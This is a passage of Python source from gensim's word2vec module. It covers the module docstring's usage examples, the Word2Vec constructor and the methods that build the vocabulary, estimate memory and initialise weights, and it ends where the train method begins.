>>> word_vectors.save("word2vec.wordvectors")
>>>
>>> # Load back with memory-mapping = read-only, shared across processes.
>>> wv = KeyedVectors.load("word2vec.wordvectors", mmap='r')
>>>
>>> vector = wv['computer'] # Get numpy vector of a word
Gensim can also load word vectors in the "word2vec C format", as a
:class:`~gensim.models.keyedvectors.KeyedVectors` instance:
.. sourcecode:: pycon
>>> from gensim.test.utils import datapath
>>>
>>> # Load a word2vec model stored in the C *text* format.
>>> wv_from_text = KeyedVectors.load_word2vec_format(datapath('word2vec_pre_kv_c'), binary=False)
>>> # Load a word2vec model stored in the C *binary* format.
>>> wv_from_bin = KeyedVectors.load_word2vec_format(datapath("euclidean_vectors.bin"), binary=True)
It is impossible to continue training the vectors loaded from the C format because the hidden weights,
vocabulary frequencies and the binary tree are missing. To continue training, you'll need the
full :class:`~gensim.models.word2vec.Word2Vec` object state, as stored by :meth:`~gensim.models.word2vec.Word2Vec.save`,
not just the :class:`~gensim.models.keyedvectors.KeyedVectors`.
You can perform various NLP tasks with a trained model. Some of the operations
are already built-in - see :mod:`gensim.models.keyedvectors`.
If you're finished training a model (i.e. no more updates, only querying),
you can switch to the :class:`~gensim.models.keyedvectors.KeyedVectors` instance:
.. sourcecode:: pycon
>>> word_vectors = model.wv
>>> del model
to trim unneeded model state = use much less RAM and allow fast loading and memory sharing (mmap).
Embeddings with multiword ngrams
================================
There is a :mod:`gensim.models.phrases` module which lets you automatically
detect phrases longer than one word, using collocation statistics.
Using phrases, you can learn a word2vec model where "words" are actually multiword expressions,
such as `new_york_times` or `financial_crisis`:
.. sourcecode:: pycon
>>> from gensim.models import Phrases
>>>
>>> # Train a bigram detector.
>>> bigram_transformer = Phrases(common_texts)
>>>
>>> # Apply the trained MWE detector to a corpus, using the result to train a Word2vec model.
>>> model = Word2Vec(bigram_transformer[common_texts], min_count=1)
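If you plan to apply the detector many times, recent Gensim releases also let you export a smaller,
faster frozen version first (a sketch, assuming ``Phrases.freeze()`` is available in your Gensim version):
.. sourcecode:: pycon
>>> # Freeze the detector: drops internal counts, keeping only the learned phrases.
>>> frozen_bigrams = bigram_transformer.freeze()
>>> model = Word2Vec(frozen_bigrams[common_texts], min_count=1)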
Pretrained models
=================
Gensim comes with several pre-trained models, in the
`Gensim-data repository <https://github.com/RaRe-Technologies/gensim-data>`_:
.. sourcecode:: pycon
>>> import gensim.downloader
>>> # Show all available models in gensim-data
>>> print(list(gensim.downloader.info()['models'].keys()))
['fasttext-wiki-news-subwords-300',
'conceptnet-numberbatch-17-06-300',
'word2vec-ruscorpora-300',
'word2vec-google-news-300',
'glove-wiki-gigaword-50',
'glove-wiki-gigaword-100',
'glove-wiki-gigaword-200',
'glove-wiki-gigaword-300',
'glove-twitter-25',
'glove-twitter-50',
'glove-twitter-100',
'glove-twitter-200',
'__testing_word2vec-matrix-synopsis']
>>>
>>> # Download the "glove-twitter-25" embeddings
>>> glove_vectors = gensim.downloader.load('glove-twitter-25')
>>>
>>> # Use the downloaded vectors as usual:
>>> glove_vectors.most_similar('twitter')
[('facebook', 0.948005199432373),
('tweet', 0.9403423070907593),
('fb', 0.9342358708381653),
('instagram', 0.9104824066162109),
('chat', 0.8964964747428894),
('hashtag', 0.8885937333106995),
('tweets', 0.8878158330917358),
('tl', 0.8778461217880249),
('link', 0.8778210878372192),
('internet', 0.8753897547721863)]
"""
from __future__ import division # py3 "true division"
import logging
import sys
import os
import heapq
from timeit import default_timer
from collections import defaultdict, namedtuple
from collections.abc import Iterable
from types import GeneratorType
import threading
import itertools
import copy
from queue import Queue, Empty
from numpy import float32 as REAL
import numpy as np
from gensim.utils import keep_vocab_item, call_on_class_only, deprecated
from gensim.models.keyedvectors import KeyedVectors, pseudorandom_weak_vector
from gensim import utils, matutils
logger = logging.getLogger(__name__)
try:
from gensim.models.word2vec_inner import ( # noqa: F401
train_batch_sg,
train_batch_cbow,
score_sentence_sg,
score_sentence_cbow,
MAX_WORDS_IN_BATCH,
FAST_VERSION,
)
except ImportError:
raise utils.NO_CYTHON
try:
from gensim.models.word2vec_corpusfile import train_epoch_sg, train_epoch_cbow, CORPUSFILE_VERSION
except ImportError:
# file-based word2vec is not supported
CORPUSFILE_VERSION = -1
def train_epoch_sg(
model, corpus_file, offset, _cython_vocab, _cur_epoch, _expected_examples, _expected_words,
_work, _neu1, compute_loss,
):
raise RuntimeError("Training with corpus_file argument is not supported")
def train_epoch_cbow(
model, corpus_file, offset, _cython_vocab, _cur_epoch, _expected_examples, _expected_words,
_work, _neu1, compute_loss,
):
raise RuntimeError("Training with corpus_file argument is not supported")
class Word2Vec(utils.SaveLoad):
def __init__(
self, sentences=None, corpus_file=None, vector_size=100, alpha=0.025, window=5, min_count=5,
max_vocab_size=None, sample=1e-3, seed=1, workers=3, min_alpha=0.0001,
sg=0, hs=0, negative=5, ns_exponent=0.75, cbow_mean=1, hashfxn=hash, epochs=5, null_word=0,
trim_rule=None, sorted_vocab=1, batch_words=MAX_WORDS_IN_BATCH, compute_loss=False, callbacks=(),
comment=None, max_final_vocab=None,
):
"""Train, use and evaluate neural networks described in https://code.google.com/p/word2vec/.
Once you're finished training a model (=no more updates, only querying)
store and use only the :class:`~gensim.models.keyedvectors.KeyedVectors` instance in ``self.wv``
to reduce memory.
The full model can be stored/loaded via its :meth:`~gensim.models.word2vec.Word2Vec.save` and
:meth:`~gensim.models.word2vec.Word2Vec.load` methods.
The trained word vectors can also be stored/loaded from a format compatible with the
original word2vec implementation via `self.wv.save_word2vec_format`
and :meth:`gensim.models.keyedvectors.KeyedVectors.load_word2vec_format`.
Parameters
----------
sentences : iterable of iterables, optional
The `sentences` iterable can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
See also the `tutorial on data streaming in Python
<https://rare-technologies.com/data-streaming-in-python-generators-iterators-iterables/>`_.
If you don't supply `sentences`, the model is left uninitialized -- use if you plan to initialize it
in some other way.
corpus_file : str, optional
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
You may use this argument instead of `sentences` to get a performance boost. Only one of the `sentences` or
`corpus_file` arguments needs to be passed (or neither of them, in which case the model is left uninitialized).
vector_size : int, optional
Dimensionality of the word vectors.
window : int, optional
Maximum distance between the current and predicted word within a sentence.
min_count : int, optional
Ignores all words with total frequency lower than this.
workers : int, optional
Use this many worker threads to train the model (=faster training with multicore machines).
sg : {0, 1}, optional
Training algorithm: 1 for skip-gram; otherwise CBOW.
hs : {0, 1}, optional
If 1, hierarchical softmax will be used for model training.
If 0, and `negative` is non-zero, negative sampling will be used.
negative : int, optional
If > 0, negative sampling will be used; the int for `negative` specifies how many "noise words"
should be drawn (usually between 5-20).
If set to 0, no negative sampling is used.
ns_exponent : float, optional
The exponent used to shape the negative sampling distribution. A value of 1.0 samples exactly in proportion
to the frequencies, 0.0 samples all words equally, while a negative value samples low-frequency words more
than high-frequency words. The popular default value of 0.75 was chosen by the original Word2Vec paper.
More recently, in https://arxiv.org/abs/1804.04212, Caselles-Dupré, Lesaint, & Royo-Letelier suggest that
other values may perform better for recommendation applications.
cbow_mean : {0, 1}, optional
If 0, use the sum of the context word vectors. If 1, use the mean, only applies when cbow is used.
alpha : float, optional
The initial learning rate.
min_alpha : float, optional
Learning rate will linearly drop to `min_alpha` as training progresses.
seed : int, optional
Seed for the random number generator. Initial vectors for each word are seeded with a hash of
the concatenation of word + `str(seed)`. Note that for a fully deterministically-reproducible run,
you must also limit the model to a single worker thread (`workers=1`), to eliminate ordering jitter
from OS thread scheduling. (In Python 3, reproducibility between interpreter launches also requires
use of the `PYTHONHASHSEED` environment variable to control hash randomization).
max_vocab_size : int, optional
Limits the RAM during vocabulary building; if there are more unique
words than this, then prune the infrequent ones. Every 10 million word types need about 1GB of RAM.
Set to `None` for no limit.
max_final_vocab : int, optional
Limits the vocab to a target vocab size by automatically picking a matching min_count. If the specified
min_count is more than the calculated min_count, the specified min_count will be used.
Set to `None` if not required.
sample : float, optional
The threshold for configuring which higher-frequency words are randomly downsampled,
useful range is (0, 1e-5).
hashfxn : function, optional
Hash function to use to randomly initialize weights, for increased training reproducibility.
epochs : int, optional
Number of iterations (epochs) over the corpus. (Formerly: `iter`)
trim_rule : function, optional
Vocabulary trimming rule, specifies whether certain words should remain in the vocabulary,
be trimmed away, or handled using the default (discard if word count < min_count).
Can be None (min_count will be used, look to :func:`~gensim.utils.keep_vocab_item`),
or a callable that accepts parameters (word, count, min_count) and returns either
:attr:`gensim.utils.RULE_DISCARD`, :attr:`gensim.utils.RULE_KEEP` or :attr:`gensim.utils.RULE_DEFAULT`.
The rule, if given, is only used to prune vocabulary during build_vocab() and is not stored as part of the
model.
The input parameters are of the following types:
* `word` (str) - the word we are examining
* `count` (int) - the word's frequency count in the corpus
* `min_count` (int) - the minimum count threshold.
sorted_vocab : {0, 1}, optional
If 1, sort the vocabulary by descending frequency before assigning word indexes.
See :meth:`~gensim.models.keyedvectors.KeyedVectors.sort_by_descending_frequency()`.
batch_words : int, optional
Target size (in words) for batches of examples passed to worker threads (and
thus cython routines). (Larger batches will be passed if individual
texts are longer than 10000 words, but the standard cython code truncates to that maximum.)
compute_loss: bool, optional
If True, computes and stores loss value which can be retrieved using
:meth:`~gensim.models.word2vec.Word2Vec.get_latest_training_loss`.
callbacks : iterable of :class:`~gensim.models.callbacks.CallbackAny2Vec`, optional
Sequence of callbacks to be executed at specific stages during training.
Examples
--------
Initialize and train a :class:`~gensim.models.word2vec.Word2Vec` model
.. sourcecode:: pycon
>>> from gensim.models import Word2Vec
>>> sentences = [["cat", "say", "meow"], ["dog", "say", "woof"]]
>>> model = Word2Vec(sentences, min_count=1)
Attributes
----------
wv : :class:`~gensim.models.keyedvectors.KeyedVectors`
This object essentially contains the mapping between words and embeddings. After training, it can be used
directly to query those embeddings in various ways. See the module level docstring for examples.
"""
corpus_iterable = sentences
self.vector_size = int(vector_size)
self.workers = int(workers)
self.epochs = epochs
self.train_count = 0
self.total_train_time = 0
self.batch_words = batch_words
self.sg = int(sg)
self.alpha = float(alpha)
self.min_alpha = float(min_alpha)
self.window = int(window)
self.random = np.random.RandomState(seed)
self.hs = int(hs)
self.negative = int(negative)
self.ns_exponent = ns_exponent
self.cbow_mean = int(cbow_mean)
self.compute_loss = bool(compute_loss)
self.running_training_loss = 0
self.min_alpha_yet_reached = float(alpha)
self.corpus_count = 0
self.corpus_total_words = 0
self.max_final_vocab = max_final_vocab
self.max_vocab_size = max_vocab_size
self.min_count = min_count
self.sample = sample
self.sorted_vocab = sorted_vocab
self.null_word = null_word
self.cum_table = None # for negative sampling
self.raw_vocab = None
if not hasattr(self, 'wv'): # set unless subclass already set (eg: FastText)
self.wv = KeyedVectors(vector_size)
# EXPERIMENTAL lockf feature; create minimal no-op lockf arrays (1 element of 1.0)
# advanced users should directly resize/adjust as desired after any vocab growth
self.wv.vectors_lockf = np.ones(1, dtype=REAL) # 0.0 values suppress word-backprop-updates; 1.0 allows
self.hashfxn = hashfxn
self.seed = seed
if not hasattr(self, 'layer1_size'): # set unless subclass already set (as for Doc2Vec dm_concat mode)
self.layer1_size = vector_size
self.comment = comment
self.load = call_on_class_only
if corpus_iterable is not None or corpus_file is not None:
self._check_corpus_sanity(corpus_iterable=corpus_iterable, corpus_file=corpus_file, passes=(epochs + 1))
self.build_vocab(corpus_iterable=corpus_iterable, corpus_file=corpus_file, trim_rule=trim_rule)
self.train(
corpus_iterable=corpus_iterable, corpus_file=corpus_file, total_examples=self.corpus_count,
total_words=self.corpus_total_words, epochs=self.epochs, start_alpha=self.alpha,
end_alpha=self.min_alpha, compute_loss=self.compute_loss, callbacks=callbacks)
else:
if trim_rule is not None:
logger.warning(
"The rule, if given, is only used to prune vocabulary during build_vocab() "
"and is not stored as part of the model. Model initialized without sentences. "
"trim_rule provided, if any, will be ignored.")
if callbacks:
logger.warning(
"Callbacks are no longer retained by the model, so must be provided whenever "
"training is triggered, as in initialization with a corpus or calling `train()`. "
"The callbacks provided in this initialization without triggering train will "
"be ignored.")
self.add_lifecycle_event("created", params=str(self))
def build_vocab(
self, corpus_iterable=None, corpus_file=None, update=False, progress_per=10000,
keep_raw_vocab=False, trim_rule=None, **kwargs,
):
"""Build vocabulary from a sequence of sentences (can be a once-only generator stream).
Parameters
----------
corpus_iterable : iterable of list of str
Can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
corpus_file : str, optional
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
You may use this argument instead of `sentences` to get a performance boost. Only one of the `sentences` or
`corpus_file` arguments needs to be passed (not both of them).
update : bool
If true, the new words in `sentences` will be added to the model's vocab.
progress_per : int, optional
Indicates how many words to process before showing/updating the progress.
keep_raw_vocab : bool, optional
If False, the raw vocabulary will be deleted after the scaling is done to free up RAM.
trim_rule : function, optional
Vocabulary trimming rule, specifies whether certain words should remain in the vocabulary,
be trimmed away, or handled using the default (discard if word count < min_count).
Can be None (min_count will be used, look to :func:`~gensim.utils.keep_vocab_item`),
or a callable that accepts parameters (word, count, min_count) and returns either
:attr:`gensim.utils.RULE_DISCARD`, :attr:`gensim.utils.RULE_KEEP` or :attr:`gensim.utils.RULE_DEFAULT`.
The rule, if given, is only used to prune vocabulary during current method call and is not stored as part
of the model.
The input parameters are of the following types:
* `word` (str) - the word we are examining
* `count` (int) - the word's frequency count in the corpus
* `min_count` (int) - the minimum count threshold.
**kwargs : object
Keyword arguments propagated to `self.prepare_vocab`.
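A minimal usage sketch, using the bundled toy corpus (build the vocabulary once, then train):
.. sourcecode:: pycon
>>> from gensim.test.utils import common_texts
>>> from gensim.models import Word2Vec
>>>
>>> model = Word2Vec(min_count=1)
>>> model.build_vocab(corpus_iterable=common_texts)  # collect counts & finalize the vocabulary
>>> # the model can now be trained, e.g.:
>>> # model.train(common_texts, total_examples=model.corpus_count, epochs=model.epochs)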
"""
self._check_corpus_sanity(corpus_iterable=corpus_iterable, corpus_file=corpus_file, passes=1)
total_words, corpus_count = self.scan_vocab(
corpus_iterable=corpus_iterable, corpus_file=corpus_file, progress_per=progress_per, trim_rule=trim_rule)
self.corpus_count = corpus_count
self.corpus_total_words = total_words
report_values = self.prepare_vocab(update=update, keep_raw_vocab=keep_raw_vocab, trim_rule=trim_rule, **kwargs)
report_values['memory'] = self.estimate_memory(vocab_size=report_values['num_retained_words'])
self.prepare_weights(update=update)
self.add_lifecycle_event("build_vocab", update=update, trim_rule=str(trim_rule))
def build_vocab_from_freq(
self, word_freq, keep_raw_vocab=False, corpus_count=None, trim_rule=None, update=False,
):
"""Build vocabulary from a dictionary of word frequencies.
Parameters
----------
word_freq : dict of (str, int)
A mapping from a word in the vocabulary to its frequency count.
keep_raw_vocab : bool, optional
If False, delete the raw vocabulary after the scaling is done to free up RAM.
corpus_count : int, optional
Even if no corpus is provided, this argument can set corpus_count explicitly.
trim_rule : function, optional
Vocabulary trimming rule, specifies whether certain words should remain in the vocabulary,
be trimmed away, or handled using the default (discard if word count < min_count).
Can be None (min_count will be used, look to :func:`~gensim.utils.keep_vocab_item`),
or a callable that accepts parameters (word, count, min_count) and returns either
:attr:`gensim.utils.RULE_DISCARD`, :attr:`gensim.utils.RULE_KEEP` or :attr:`gensim.utils.RULE_DEFAULT`.
The rule, if given, is only used to prune vocabulary during current method call and is not stored as part
of the model.
The input parameters are of the following types:
* `word` (str) - the word we are examining
* `count` (int) - the word's frequency count in the corpus
* `min_count` (int) - the minimum count threshold.
update : bool, optional
If true, the new words provided in the `word_freq` dict will be added to the model's vocab.
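A minimal sketch (the word counts below are made up purely for illustration):
.. sourcecode:: pycon
>>> from gensim.models import Word2Vec
>>>
>>> model = Word2Vec(vector_size=50, min_count=1)
>>> model.build_vocab_from_freq({'hello': 10, 'world': 7}, corpus_count=2)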
"""
logger.info("Processing provided word frequencies")
# Instead of scanning text, this assigns the provided word frequencies dictionary (word_freq)
# directly as the raw vocab
raw_vocab = word_freq
logger.info(
"collected %i different raw word, with total frequency of %i",
len(raw_vocab), sum(raw_vocab.values()),
)
# Since no sentences are provided, this is to control the corpus_count.
self.corpus_count = corpus_count or 0
self.raw_vocab = raw_vocab
# trim by min_count & precalculate downsampling
report_values = self.prepare_vocab(keep_raw_vocab=keep_raw_vocab, trim_rule=trim_rule, update=update)
report_values['memory'] = self.estimate_memory(vocab_size=report_values['num_retained_words'])
self.prepare_weights(update=update) # build tables & arrays
def _scan_vocab(self, sentences, progress_per, trim_rule):
sentence_no = -1
total_words = 0
min_reduce = 1
vocab = defaultdict(int)
checked_string_types = 0
for sentence_no, sentence in enumerate(sentences):
if not checked_string_types:
if isinstance(sentence, str):
logger.warning(
"Each 'sentences' item should be a list of words (usually unicode strings). "
"First item here is instead plain %s.",
type(sentence),
)
checked_string_types += 1
if sentence_no % progress_per == 0:
logger.info(
"PROGRESS: at sentence #%i, processed %i words, keeping %i word types",
sentence_no, total_words, len(vocab)
)
for word in sentence:
vocab[word] += 1
total_words += len(sentence)
if self.max_vocab_size and len(vocab) > self.max_vocab_size:
utils.prune_vocab(vocab, min_reduce, trim_rule=trim_rule)
min_reduce += 1
corpus_count = sentence_no + 1
self.raw_vocab = vocab
return total_words, corpus_count
def scan_vocab(self, corpus_iterable=None, corpus_file=None, progress_per=10000, workers=None, trim_rule=None):
logger.info("collecting all words and their counts")
if corpus_file:
corpus_iterable = LineSentence(corpus_file)
total_words, corpus_count = self._scan_vocab(corpus_iterable, progress_per, trim_rule)
logger.info(
"collected %i word types from a corpus of %i raw words and %i sentences",
len(self.raw_vocab), total_words, corpus_count
)
return total_words, corpus_count
def prepare_vocab(
self, update=False, keep_raw_vocab=False, trim_rule=None,
min_count=None, sample=None, dry_run=False,
):
"""Apply vocabulary settings for `min_count` (discarding less-frequent words)
and `sample` (controlling the downsampling of more-frequent words).
Calling with `dry_run=True` will only simulate the provided settings and
report the size of the retained vocabulary, effective corpus length, and
estimated memory requirements. Results are both printed via logging and
returned as a dict.
Delete the raw vocabulary after the scaling is done to free up RAM,
unless `keep_raw_vocab` is set.
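For example, a dry run to preview the effect of the current settings might look like this
(a sketch; it assumes the raw counts are still available, e.g. right after a ``scan_vocab()`` call):
.. sourcecode:: pycon
>>> from gensim.test.utils import common_texts
>>> from gensim.models import Word2Vec
>>>
>>> model = Word2Vec()
>>> _ = model.scan_vocab(corpus_iterable=common_texts)  # collect raw counts only
>>> report = model.prepare_vocab(min_count=1, dry_run=True)  # simulate; nothing is applied
>>> retained = report['num_retained_words']  # size of the vocabulary that would be kept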
"""
min_count = min_count or self.min_count
sample = sample or self.sample
drop_total = drop_unique = 0
# set effective_min_count to min_count in case max_final_vocab isn't set
self.effective_min_count = min_count
# if max_final_vocab is specified instead of min_count
# pick a min_count which satisfies max_final_vocab as well as possible
if self.max_final_vocab is not None:
sorted_vocab = sorted(self.raw_vocab.keys(), key=lambda word: self.raw_vocab[word], reverse=True)
calc_min_count = 1
if self.max_final_vocab < len(sorted_vocab):
calc_min_count = self.raw_vocab[sorted_vocab[self.max_final_vocab]] + 1
self.effective_min_count = max(calc_min_count, min_count)
self.add_lifecycle_event(
"prepare_vocab",
msg=(
f"max_final_vocab={self.max_final_vocab} and min_count={min_count} resulted "
f"in calc_min_count={calc_min_count}, effective_min_count={self.effective_min_count}"
)
)
if not update:
logger.info("Creating a fresh vocabulary")
retain_total, retain_words = 0, []
# Discard words less-frequent than min_count
if not dry_run:
self.wv.index_to_key = []
# make stored settings match these applied settings
self.min_count = min_count
self.sample = sample
self.wv.key_to_index = {}
for word, v in self.raw_vocab.items():
if keep_vocab_item(word, v, self.effective_min_count, trim_rule=trim_rule):
retain_words.append(word)
retain_total += v
if not dry_run:
self.wv.key_to_index[word] = len(self.wv.index_to_key)
self.wv.index_to_key.append(word)
else:
drop_unique += 1
drop_total += v
if not dry_run:
# now update counts
for word in self.wv.index_to_key:
self.wv.set_vecattr(word, 'count', self.raw_vocab[word])
original_unique_total = len(retain_words) + drop_unique
retain_unique_pct = len(retain_words) * 100 / max(original_unique_total, 1)
self.add_lifecycle_event(
"prepare_vocab",
msg=(
f"effective_min_count={self.effective_min_count} retains {len(retain_words)} unique "
f"words ({retain_unique_pct}%% of original {original_unique_total}, drops {drop_unique})"
),
)
original_total = retain_total + drop_total
retain_pct = retain_total * 100 / max(original_total, 1)
self.add_lifecycle_event(
"prepare_vocab",
msg=(
f"effective_min_count={self.effective_min_count} leaves {retain_total} word corpus "
f"({retain_pct}%% of original {original_total}, drops {drop_total})"
),
)
else:
logger.info("Updating model with new vocabulary")
new_total = pre_exist_total = 0
new_words = []
pre_exist_words = []
for word, v in self.raw_vocab.items():
if keep_vocab_item(word, v, self.effective_min_count, trim_rule=trim_rule):
if self.wv.has_index_for(word):
pre_exist_words.append(word)
pre_exist_total += v
if not dry_run:
pass
else:
new_words.append(word)
new_total += v
if not dry_run:
self.wv.key_to_index[word] = len(self.wv.index_to_key)
self.wv.index_to_key.append(word)
else:
drop_unique += 1
drop_total += v
if not dry_run:
# now update counts
self.wv.allocate_vecattrs(attrs=['count'], types=[type(0)])
for word in self.wv.index_to_key:
self.wv.set_vecattr(word, 'count', self.wv.get_vecattr(word, 'count') + self.raw_vocab.get(word, 0))
original_unique_total = len(pre_exist_words) + len(new_words) + drop_unique
pre_exist_unique_pct = len(pre_exist_words) * 100 / max(original_unique_total, 1)
new_unique_pct = len(new_words) * 100 / max(original_unique_total, 1)
self.add_lifecycle_event(
"prepare_vocab",
msg=(
f"added {len(new_words)} new unique words ({new_unique_pct}%% of original "
f"{original_unique_total}) and increased the count of {len(pre_exist_words)} "
f"pre-existing words ({pre_exist_unique_pct}%% of original {original_unique_total})"
),
)
retain_words = new_words + pre_exist_words
retain_total = new_total + pre_exist_total
# Precalculate each vocabulary item's threshold for sampling
if not sample:
# no words downsampled
threshold_count = retain_total
elif sample < 1.0:
# traditional meaning: set parameter as proportion of total
threshold_count = sample * retain_total
else:
# new shorthand: sample >= 1 means downsample all words with higher count than sample
threshold_count = int(sample * (3 + np.sqrt(5)) / 2)
downsample_total, downsample_unique = 0, 0
for w in retain_words:
v = self.raw_vocab[w]
word_probability = (np.sqrt(v / threshold_count) + 1) * (threshold_count / v)
if word_probability < 1.0:
downsample_unique += 1
downsample_total += word_probability * v
else:
word_probability = 1.0
downsample_total += v
if not dry_run:
self.wv.set_vecattr(w, 'sample_int', np.uint32(word_probability * (2**32 - 1)))
if not dry_run and not keep_raw_vocab:
logger.info("deleting the raw counts dictionary of %i items", len(self.raw_vocab))
self.raw_vocab = defaultdict(int)
logger.info("sample=%g downsamples %i most-common words", sample, downsample_unique)
self.add_lifecycle_event(
"prepare_vocab",
msg=(
f"downsampling leaves estimated {downsample_total} word corpus "
f"({downsample_total * 100.0 / max(retain_total, 1):.1f}%% of prior {retain_total})"
),
)
# return from each step: words-affected, resulting-corpus-size, extra memory estimates
report_values = {
'drop_unique': drop_unique, 'retain_total': retain_total, 'downsample_unique': downsample_unique,
'downsample_total': int(downsample_total), 'num_retained_words': len(retain_words)
}
if self.null_word:
# create null pseudo-word for padding when using concatenative L1 (run-of-words)
# this word is only ever input – never predicted – so count, huffman-point, etc doesn't matter
self.add_null_word()
if self.sorted_vocab and not update:
self.wv.sort_by_descending_frequency()
if self.hs:
# add info about each word's Huffman encoding
self.create_binary_tree()
if self.negative:
# build the table for drawing random words (for negative sampling)
self.make_cum_table()
return report_values
def estimate_memory(self, vocab_size=None, report=None):
"""Estimate required memory for a model using current settings and provided vocabulary size.
Parameters
----------
vocab_size : int, optional
Number of unique tokens in the vocabulary
report : dict of (str, int), optional
A dictionary from string representations of the model's memory consuming members to their size in bytes.
Returns
-------
dict of (str, int)
A dictionary from string representations of the model's memory consuming members to their size in bytes.
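A usage sketch, assuming ``model`` is an already-initialized :class:`~gensim.models.word2vec.Word2Vec`
instance (the absolute numbers are rough, settings-dependent estimates):
.. sourcecode:: pycon
>>> mem = model.estimate_memory(vocab_size=10000)
>>> total_bytes = mem['total']  # overall estimate, in bytes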
"""
vocab_size = vocab_size or len(self.wv)
report = report or {}
report['vocab'] = vocab_size * (700 if self.hs else 500)
report['vectors'] = vocab_size * self.vector_size * np.dtype(REAL).itemsize
if self.hs:
report['syn1'] = vocab_size * self.layer1_size * np.dtype(REAL).itemsize
if self.negative:
report['syn1neg'] = vocab_size * self.layer1_size * np.dtype(REAL).itemsize
report['total'] = sum(report.values())
logger.info(
"estimated required memory for %i words and %i dimensions: %i bytes",
vocab_size, self.vector_size, report['total'],
)
return report
def add_null_word(self):
word = '\0'
self.wv.key_to_index[word] = len(self.wv)
self.wv.index_to_key.append(word)
self.wv.set_vecattr(word, 'count', 1)
def create_binary_tree(self):
"""Create a `binary Huffman tree <https://en.wikipedia.org/wiki/Huffman_coding>`_ using stored vocabulary
word counts. Frequent words will have shorter binary codes.
Called internally from :meth:`~gensim.models.word2vec.Word2VecVocab.build_vocab`.
"""
_assign_binary_codes(self.wv)
def make_cum_table(self, domain=2**31 - 1):
"""Create a cumulative-distribution table using stored vocabulary word counts for
drawing random words in the negative-sampling training routines.
To draw a word index, choose a random integer up to the maximum value in the table (cum_table[-1]),
then find that integer's sorted insertion point (as if by `bisect_left` or `ndarray.searchsorted()`).
That insertion point is the drawn index, coming up in proportion equal to the increment at that slot.
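Purely to illustrate that lookup (the optimized Cython training routines perform the real sampling
internally), assuming the table has already been built, e.g. via :meth:`build_vocab`:
.. sourcecode:: pycon
>>> import numpy as np
>>>
>>> drawn_index = model.cum_table.searchsorted(np.random.randint(model.cum_table[-1]))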
"""
vocab_size = len(self.wv.index_to_key)
self.cum_table = np.zeros(vocab_size, dtype=np.uint32)
# compute sum of all power (Z in paper)
train_words_pow = 0.0
for word_index in range(vocab_size):
count = self.wv.get_vecattr(word_index, 'count')
train_words_pow += count**self.ns_exponent
cumulative = 0.0
for word_index in range(vocab_size):
count = self.wv.get_vecattr(word_index, 'count')
cumulative += count**self.ns_exponent
self.cum_table[word_index] = round(cumulative / train_words_pow * domain)
if len(self.cum_table) > 0:
assert self.cum_table[-1] == domain
def prepare_weights(self, update=False):
"""Build tables and model weights based on final vocabulary settings."""
# set initial input/projection and hidden weights
if not update:
self.init_weights()
else:
self.update_weights()
@deprecated("Use gensim.models.keyedvectors.pseudorandom_weak_vector() directly")
def seeded_vector(self, seed_string, vector_size):
return pseudorandom_weak_vector(vector_size, seed_string=seed_string, hashfxn=self.hashfxn)
def init_weights(self):
"""Reset all projection weights to an initial (untrained) state, but keep the existing vocabulary."""
logger.info("resetting layer weights")
self.wv.resize_vectors(seed=self.seed)
if self.hs:
self.syn1 = np.zeros((len(self.wv), self.layer1_size), dtype=REAL)
if self.negative:
self.syn1neg = np.zeros((len(self.wv), self.layer1_size), dtype=REAL)
def update_weights(self):
"""Copy all the existing weights, and reset the weights for the newly added vocabulary."""
logger.info("updating layer weights")
# Raise an error if an online update is run before initial training on a corpus
if not len(self.wv.vectors):
raise RuntimeError(
"You cannot do an online vocabulary-update of a model which has no prior vocabulary. "
"First build the vocabulary of your model with a corpus before doing an online update."
)
preresize_count = len(self.wv.vectors)
self.wv.resize_vectors(seed=self.seed)
gained_vocab = len(self.wv.vectors) - preresize_count
if self.hs:
self.syn1 = np.vstack([self.syn1, np.zeros((gained_vocab, self.layer1_size), dtype=REAL)])
if self.negative:
pad = np.zeros((gained_vocab, self.layer1_size), dtype=REAL)
self.syn1neg = np.vstack([self.syn1neg, pad])
@deprecated(
"Gensim 4.0.0 implemented internal optimizations that make calls to init_sims() unnecessary. "
"init_sims() is now obsoleted and will be completely removed in future versions. "
"See https://github.com/RaRe-Technologies/gensim/wiki/Migrating-from-Gensim-3.x-to-4"
)
def init_sims(self, replace=False):
"""
Precompute L2-normalized vectors. Obsoleted.
If you need a single unit-normalized vector for some key, call
:meth:`~gensim.models.keyedvectors.KeyedVectors.get_vector` instead:
``word2vec_model.wv.get_vector(key, norm=True)``.
To refresh norms after you performed some atypical out-of-band vector tampering,
call :meth:`~gensim.models.keyedvectors.KeyedVectors.fill_norms()` instead.
Parameters
----------
replace : bool
If True, forget the original trained vectors and only keep the normalized ones.
You lose information if you do this.
"""
self.wv.init_sims(replace=replace)
def _do_train_epoch(
self, corpus_file, thread_id, offset, cython_vocab, thread_private_mem, cur_epoch,
total_examples=None, total_words=None, **kwargs,
):
work, neu1 = thread_private_mem
if self.sg:
examples, tally, raw_tally = train_epoch_sg(
self, corpus_file, offset, cython_vocab, cur_epoch,
total_examples, total_words, work, neu1, self.compute_loss,
)
else:
examples, tally, raw_tally = train_epoch_cbow(
self, corpus_file, offset, cython_vocab, cur_epoch,
total_examples, total_words, work, neu1, self.compute_loss,
)
return examples, tally, raw_tally
def _do_train_job(self, sentences, alpha, inits):
"""Train the model on a single batch of sentences.
Parameters
----------
sentences : iterable of list of str
Corpus chunk to be used in this training batch.
alpha : float
The learning rate used in this batch.
inits : (np.ndarray, np.ndarray)
Each worker thread's private work memory.
Returns
-------
(int, int)
2-tuple (effective word count after ignoring unknown words and sentence length trimming, total word count).
"""
work, neu1 = inits
tally = 0
if self.sg:
tally += train_batch_sg(self, sentences, alpha, work, self.compute_loss)
else:
tally += train_batch_cbow(self, sentences, alpha, work, neu1, self.compute_loss)
return tally, self._raw_word_count(sentences)
def _clear_post_train(self):
"""Clear any cached values that training may have invalidated."""
self.wv.norms = None
def train(
